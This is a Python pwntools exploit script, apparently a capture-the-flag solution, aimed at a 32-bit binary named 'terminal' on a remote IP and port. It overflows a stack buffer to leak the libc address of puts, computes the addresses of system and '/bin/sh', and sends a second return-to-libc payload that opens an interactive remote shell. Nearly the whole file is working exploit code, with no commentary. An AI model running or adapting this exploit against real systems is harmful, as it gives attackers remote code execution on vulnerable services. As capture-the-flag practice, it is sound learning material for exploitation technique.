33 lines
602 B
Python
33 lines
602 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./terminal", checksec=False)
|
|
# r = process()
|
|
r = remote("20.199.76.210", 1005)
|
|
|
|
# func
|
|
s = lambda a: r.sendlineafter(b"# ", a)
|
|
|
|
# leak
|
|
buf = b"A"*62
|
|
buf += p32(target.sym.puts)
|
|
buf += p32(0x804974d)
|
|
buf += p32(target.got.puts)
|
|
s(buf)
|
|
puts = u32(r.recv(4))
|
|
log.info("puts: 0x%lx", puts)
|
|
libc_base = puts - 0x76aa0
|
|
log.info("libc: 0x%lx", libc_base)
|
|
system = libc_base + 0x4f8f0
|
|
log.info("system: 0x%lx", system)
|
|
sh = libc_base + 0x1bcde8
|
|
|
|
# shell
|
|
buf = b"A"*62
|
|
buf += p32(system)
|
|
buf += b"BLUH"
|
|
buf += p32(sh)
|
|
s(buf)
|
|
|
|
r.interactive() |